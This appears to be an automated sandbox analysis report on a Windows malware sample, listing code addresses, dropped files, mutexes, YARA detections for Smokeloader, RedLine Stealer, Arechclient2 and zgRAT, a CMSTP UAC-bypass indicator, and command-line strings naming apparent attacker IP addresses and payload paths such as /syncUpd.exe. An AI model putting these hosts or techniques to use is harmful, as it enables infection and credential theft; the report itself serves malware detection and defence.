Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BB8A820	1_2_6BB8A820
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BBD4840	1_2_6BBD4840
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BB0EFB0	1_2_6BB0EFB0
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BBDEFF0	1_2_6BBDEFF0
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BB00FE0	1_2_6BB00FE0
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BC48FB0	1_2_6BC48FB0
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BB06F10	1_2_6BB06F10
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BBC2F70	1_2_6BBC2F70
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BC40F20	1_2_6BC40F20
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BB6EF40	1_2_6BB6EF40
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BB86E90	1_2_6BB86E90
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BB0AEC0	1_2_6BB0AEC0
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BBA0EC0	1_2_6BBA0EC0
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BBE0E20	1_2_6BBE0E20
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BB9EE70	1_2_6BB9EE70
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BB04DB0	1_2_6BB04DB0
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BC8CDC0	1_2_6BC8CDC0
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BB96D90	1_2_6BB96D90
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BC2AD50	1_2_6BC2AD50
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BBCED70	1_2_6BBCED70
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BC88D20	1_2_6BC88D20
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BB5ECD0	1_2_6BB5ECD0
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BAFECC0	1_2_6BAFECC0
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BBDAC30	1_2_6BBDAC30
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BBC6C00	1_2_6BBC6C00
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BB0AC60	1_2_6BB0AC60
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BB5E3B0	1_2_6BB5E3B0
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BB323A0	1_2_6BB323A0
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BB543E0	1_2_6BB543E0
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BB72320	1_2_6BB72320
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BC1C360	1_2_6BC1C360
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BC42370	1_2_6BC42370
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BB02370	1_2_6BB02370
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BB96370	1_2_6BB96370
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BB08340	1_2_6BB08340
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BC862C0	1_2_6BC862C0
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BBCE2B0	1_2_6BBCE2B0
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: 1_2_6BBD22A0	1_2_6BBD22A0
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Code function: 3_2_00B94060	3_2_00B94060
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Code function: 3_2_00BAF840	3_2_00BAF840
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Code function: 3_2_00BB6130	3_2_00BB6130
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Code function: 3_2_00B92120	3_2_00B92120
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Code function: 3_2_00BAB150	3_2_00BAB150
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Code function: 3_2_00BDCAA0	3_2_00BDCAA0
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Code function: 3_2_00BE9A00	3_2_00BE9A00
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Code function: 3_2_00BA4390	3_2_00BA4390
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Code function: 3_2_00BB0390	3_2_00BB0390
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Code function: 3_2_00BBFC10	3_2_00BBFC10
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Code function: 3_2_00B9D570	3_2_00B9D570
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Code function: 3_2_00BE5550	3_2_00BE5550
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Code function: 3_2_00B9A6F0	3_2_00B9A6F0
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Code function: 3_2_00BB66F0	3_2_00BB66F0
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Code function: 3_2_00BE96E0	3_2_00BE96E0
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Code function: 3_2_00B937B0	3_2_00B937B0
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Code function: 3_2_6C9D4D8F	3_2_6C9D4D8F
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Code function: 3_2_6C9D3D16	3_2_6C9D3D16
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Code function: 3_2_6C9E371C	3_2_6C9E371C
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Code function: 3_2_6C94D24D	3_2_6C94D24D

Source: Joe Sandbox View	Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View	Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A

Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: String function: 04167A73 appears 43 times
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: String function: 04149F27 appears 48 times
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: String function: 00409CC0 appears 48 times
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Code function: String function: 0042780C appears 43 times
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Code function: String function: 00B91930 appears 76 times
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Code function: String function: 00B91310 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Code function: String function: 00D19D36 appears 33 times
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Code function: String function: 6C9D4701 appears 65 times
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Code function: String function: 6C9D6320 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Code function: String function: 00B91900 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Code function: String function: 00B914F0 appears 60 times
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: String function: 6BC8DAE0 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: String function: 6BA8CBE8 appears 134 times
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: String function: 6BC809D0 appears 149 times
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: String function: 6BA994D0 appears 90 times
Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe	Code function: String function: 004043B0 appears 316 times

Source: C:\Users\user\Desktop\VucRf0jboS.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7436 -s 1168

Source: VucRf0jboS.exe, 00000000.00000003.1904722744.0000000005E3F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs VucRf0jboS.exe
Source: VucRf0jboS.exe, 00000000.00000003.1900960744.0000000005E5C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs VucRf0jboS.exe
Source: VucRf0jboS.exe, 00000000.00000002.2367036917.0000000004043000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameFirezer0 vs VucRf0jboS.exe
Source: VucRf0jboS.exe, 00000000.00000003.1900617495.0000000005E5C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs VucRf0jboS.exe
Source: VucRf0jboS.exe, 00000000.00000002.2368707088.000000000421E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFirezer0 vs VucRf0jboS.exe
Source: VucRf0jboS.exe, 00000000.00000003.1898323148.0000000005E55000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs VucRf0jboS.exe
Source: VucRf0jboS.exe, 00000000.00000003.1898323148.0000000005E55000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dll vs VucRf0jboS.exe
Source: VucRf0jboS.exe, 00000000.00000003.1896778569.0000000005E5C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs VucRf0jboS.exe
Source: VucRf0jboS.exe, 00000000.00000003.1898558114.0000000005E44000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs VucRf0jboS.exe
Source: VucRf0jboS.exe, 00000000.00000003.1900455279.0000000005E55000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs VucRf0jboS.exe
Source: VucRf0jboS.exe, 00000000.00000003.1901044068.0000000005E94000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs VucRf0jboS.exe
Source: VucRf0jboS.exe, 00000000.00000003.1896918659.0000000005E3F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dll vs VucRf0jboS.exe
Source: VucRf0jboS.exe, 00000000.00000003.2187851077.0000000007202000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename vs VucRf0jboS.exe
Source: VucRf0jboS.exe, 00000000.00000003.2187851077.0000000007202000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFileName vs VucRf0jboS.exe
Source: VucRf0jboS.exe, 00000000.00000003.2187851077.0000000007202000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \OriginalFileName vs VucRf0jboS.exe
Source: VucRf0jboS.exe, 00000000.00000003.1898289031.0000000005E44000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs VucRf0jboS.exe
Source: VucRf0jboS.exe, 00000000.00000003.1898289031.0000000005E44000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dll vs VucRf0jboS.exe
Source: VucRf0jboS.exe, 00000000.00000003.1897099676.0000000005E5C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dll vs VucRf0jboS.exe
Source: VucRf0jboS.exe, 00000000.00000003.1898423297.0000000005E5E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs VucRf0jboS.exe
Source: VucRf0jboS.exe, 00000000.00000003.1898398751.0000000005E6F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dll vs VucRf0jboS.exe
Source: VucRf0jboS.exe, 00000000.00000003.1904258176.0000000005E95000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs VucRf0jboS.exe
Source: VucRf0jboS.exe, 00000000.00000003.1898943170.0000000005E70000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs VucRf0jboS.exe
Source: VucRf0jboS.exe, 00000000.00000003.1900617495.0000000005E94000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs VucRf0jboS.exe
Source: VucRf0jboS.exe, 00000000.00000003.1904125593.0000000005E94000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs VucRf0jboS.exe
Source: VucRf0jboS.exe, 00000000.00000003.2187851077.00000000075EE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameL vs VucRf0jboS.exe
Source: VucRf0jboS.exe, 00000000.00000003.1896708658.0000000005E40000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs VucRf0jboS.exe
Source: VucRf0jboS.exe, 00000000.00000003.1905208754.0000000005E3F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs VucRf0jboS.exe
Source: VucRf0jboS.exe, 00000000.00000003.1896744021.0000000005E4A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs VucRf0jboS.exe
Source: VucRf0jboS.exe, 00000000.00000003.1905856604.0000000005E42000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs VucRf0jboS.exe
Source: VucRf0jboS.exe, 00000000.00000003.1897295642.0000000005E62000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dll vs VucRf0jboS.exe
Source: VucRf0jboS.exe, 00000000.00000003.1900867741.0000000005E55000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs VucRf0jboS.exe
Source: VucRf0jboS.exe, 00000000.00000003.1898670288.0000000005E5D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs VucRf0jboS.exe
Source: VucRf0jboS.exe, 00000000.00000003.1758649321.0000000005DC1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFirezer0 vs VucRf0jboS.exe
Source: VucRf0jboS.exe, 00000000.00000002.2369348636.0000000005DC0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameL vs VucRf0jboS.exe
Source: VucRf0jboS.exe, 00000000.00000003.1896816236.0000000005E62000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs VucRf0jboS.exe

Source: VucRf0jboS.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 14.2.run.exe.39d686d.7.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 18.2.MSBuild.exe.900000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 6.2.cmd.exe.54c00c8.8.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 3.2.run.exe.3e7ad5b.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 14.2.run.exe.3a1ad5b.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 15.2.cmd.exe.52100c8.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 15.2.cmd.exe.4c3b976.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 6.2.cmd.exe.4a80e64.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 3.2.run.exe.3e7a15b.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 6.2.cmd.exe.54c00c8.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 15.2.cmd.exe.52100c8.7.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: 14.2.run.exe.3a1a15b.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 15.2.cmd.exe.4c7f264.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 6.2.cmd.exe.4a3c976.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 15.2.cmd.exe.4c7fe64.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 3.2.run.exe.3e3686d.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 6.2.cmd.exe.4a80264.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 17.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20e900c6ca8.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee882432f.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee54c537d.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee8848739.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee54e4dad.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee54d47a3.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 17.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.20ee87fd525.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 00000000.00000002.2367868984.0000000004140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000001.00000002.2492933650.0000000004054000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000001.00000002.2493849250.0000000005C70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.2368576914.00000000041E5000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: C:\Users\user\AppData\Local\Temp\nkho, type: DROPPED	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT
Source: C:\Users\user\AppData\Local\Temp\ssfwvk, type: DROPPED	Matched rule: MALWARE_Win_Arechclient2 author = ditekSHen, description = Detects Arechclient2 RAT

Source: 6.2.cmd.exe.54c00c8.8.raw.unpack, -Module-.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 15.2.cmd.exe.52100c8.7.raw.unpack, -Module-.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@27/63@5/8

Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe

Code function: 1_2_6BAB7030 GetLastError,FormatMessageA,__acrt_iob_func,__acrt_iob_func,__acrt_iob_func,fflush,LocalFree,

1_2_6BAB7030

Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe

Code function: 3_2_00BCD660 GetDiskFreeSpaceExW,std::exception::exception,__CxxThrowException@8,

3_2_00BCD660

Source: C:\Users\user\Desktop\VucRf0jboS.exe

Code function: 0_2_041E5BD6 CreateToolhelp32Snapshot,Module32First,

0_2_041E5BD6

Source: C:\Users\user\Desktop\VucRf0jboS.exe

Code function: 0_2_0042628B CoInitialize,CoCreateInstance,MultiByteToWideChar,MultiByteToWideChar,SysAllocStringLen,MultiByteToWideChar,MultiByteToWideChar,SysAllocStringLen,MultiByteToWideChar,

0_2_0042628B

Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe

Code function: 3_2_00BA8040 LoadResource,LockResource,SizeofResource,

3_2_00BA8040

Source: C:\Users\user\AppData\Local\Temp\u5qk.0.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Mutant created: \Sessions\1\BaseNamedObjects\e7cbbe5f9b9841e6afa735541f989b8a
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2996:120:WilError_03
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\FBAKEHIEBK.exe	Mutant created: \Sessions\1\BaseNamedObjects\8dddf1vvvv
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Mutant created: \Sessions\1\BaseNamedObjects\Canon_UIW_Inst_v1
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7792:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7436
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7516

Source: C:\Users\user\Desktop\VucRf0jboS.exe

File created: C:\Users\user\AppData\Local\Temp\u5qk.0.exe

Jump to behavior

Source: Yara match	File source: 9.0.u5qk.3.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000000.2186967041.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2187851077.00000000071E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe, type: DROPPED

Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: two	0_2_00424A0E
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: two	0_2_00424A0E
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: two	0_2_00424A0E
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: 185.172.128.90	0_2_00424A0E
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: 185.172.128.90	0_2_00424A0E
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: 185.172.128.90	0_2_00424A0E
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: Installed	0_2_00424A0E
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: Installed	0_2_00424A0E
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: 185.172.128.228	0_2_00424A0E
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: 185.172.128.228	0_2_00424A0E
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: 185.172.128.228	0_2_00424A0E
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: 185.172.128.59	0_2_00424A0E
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: 185.172.128.59	0_2_00424A0E
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: 185.172.128.203	0_2_00424A0E
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: 185.172.128.203	0_2_00424A0E
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: /syncUpd.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: /syncUpd.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: /timeSync.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: /timeSync.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: 185.172.128.203	0_2_00424A0E
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: 185.172.128.59	0_2_00424A0E
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: /timeSync.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: /syncUpd.exe	0_2_00424A0E
Source: C:\Users\user\Desktop\VucRf0jboS.exe	Command line argument: .exe	0_2_00424A0E
